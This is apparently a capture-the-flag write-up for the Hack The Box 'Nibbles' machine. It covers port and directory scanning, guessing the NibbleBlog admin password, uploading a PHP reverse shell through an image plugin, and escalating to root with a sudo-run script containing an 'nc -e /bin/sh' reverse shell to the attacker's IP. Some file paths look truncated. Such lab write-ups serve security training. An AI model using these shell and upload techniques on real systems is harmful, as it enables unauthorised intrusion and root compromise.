HTB - Nibbles without MetaSploit


Easy box, according to HTB notation, also not a very good user’s rating. Let’s see what it is about!


HTB - Nibbles


Quick recon according to logo and info :

  • Linux box ;
  • Misc : web, misconfiguration.


Classic nmap scan :

sudo nmap -T4 -A -p- -oA scan $target_ip
Starting Nmap 7.91 ( ) at 2021-02-17 16:42 CET
Nmap scan report for $target_ip
Host is up (0.023s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
1   23.69 ms
2   24.01 ms $target_ip

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 47.45 seconds

Web scanning

Let’s enumerate web folders in CLI, for a change :

gobuster dir -u http://$target_ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 200 -x .php

This won’t give us much information, however by browsing to the website and checking its source we find a new URL :

Nibbles Check Source

We fire gobuster one more time, with this new URL :

gobuster dir -u http://$target_ip/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -t 200 -x .php

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:            http://$target_ip/nibbleblog/
[+] Threads:        200
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
2021/02/17 16:54:47 Starting gobuster
/themes (Status: 301)
/feed.php (Status: 200)
/admin (Status: 301)
/admin.php (Status: 200)
/plugins (Status: 301)
/install.php (Status: 200)
/update.php (Status: 200)
/languages (Status: 301)
/index.php (Status: 200)
/content (Status: 301)
/sitemap.php (Status: 200)
2021/02/17 16:55:21 Finished

It will reveal juicier info, such as admin.php, install.php, sitemap, etc.

Going to install.php will tell us the site is already installed and propose to upgrade it which will eventually leak NibbleBlog version 4.0.3 :

Nibbles Version

By checking source code on Github, we also find juicy directory in /content/private :

Nibbles Directory Listing

Now checking searchsploit we find that our version is vulnerable to Authenticated Arbitrary File Upload. It means we need to get the credentials.

By looking inside the users.xml file we can suppose that admin is the login.


Now, we could try to brute force the admin area, however it won’t be effective since Nibbleblog will temporarily block our IP after a few attempts:

Nibbles WAF

Here, again, I spent way more time than I care to admit. You have to find the password, but can’t “crack” it which means we have to guess it. I tried a lot of stuff… but couldn’t find it, so I cheated… again!

We know the password is admin, and the password is nibbles, like the box’s name (which I tried), but I uesd a capital N.

Nibbles Admin Area

Now that we have our credentials, we can finally start playing with the CVE we found earlier! Since, we are trying to solve this without MetaSploit, we need to find a manual way to exploit our target.

Getting initial shell

Let’s create a [php shell(], thanks to Pentest Monkey and upload it via the Image plugin located at http://$target_ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image, then we will run shell my going to this URL : http://$target_ip/nibbleblog/content/private/plugins/my_image/image.php. The filename will always be image.ext with ext being the “real” extension.

NB : do not forget to start your listener : nc -nlvp 1234.

And we are in, unfortunately as nibbler and not root :

Nibbles Initial Shell

Let’s still grab the user flag :

Nibbles User Flag

And now… we need to escalate our priv!


Before we can have a chance to elevate our privs, we should do more internal recon.

We’ll upload LSE, in order to check for any “entry points” to privileges escalation.

We will serve our script via sudo python2 -m SimpleHTTPServer 80 since our target doesn’t seem to resolve Github’s domain’s and download it with curl.

Once it downloaded, give it exec right, then run it. Something interesting will come up :

Nibbles LSE Sudo

This means that we’ll be able to run anything as root as long as it is in /home/nibbler/personal/stuff/

All right! Let’s try to run a reverse shell :

cd /home/nibbler
echo "#!/bin/bash" > personal/stuff/
echo "nc -e "/bin/sh" $attacking_ip 1235" >> personal/stuff/
chmod +x personal/stuff/

Now we run it :

sudo /home/nibbler/personal/stuff/

NB : don’t forget to start the listener on your attacking machine.

And that’s it, we have root :

Nibbles Root Shell

And we grab the last flag :

Nibbles Root Flag


Let me be blunt. Getting the admin’s password sucked, and was no fun at all. By judging from the comments on the forum and the poor notation, I guess I wasn’t the only one really frustrated while trying to get initial access. However, once I was in, while it was pretty easy, it was also super fun and really enjoyed this box!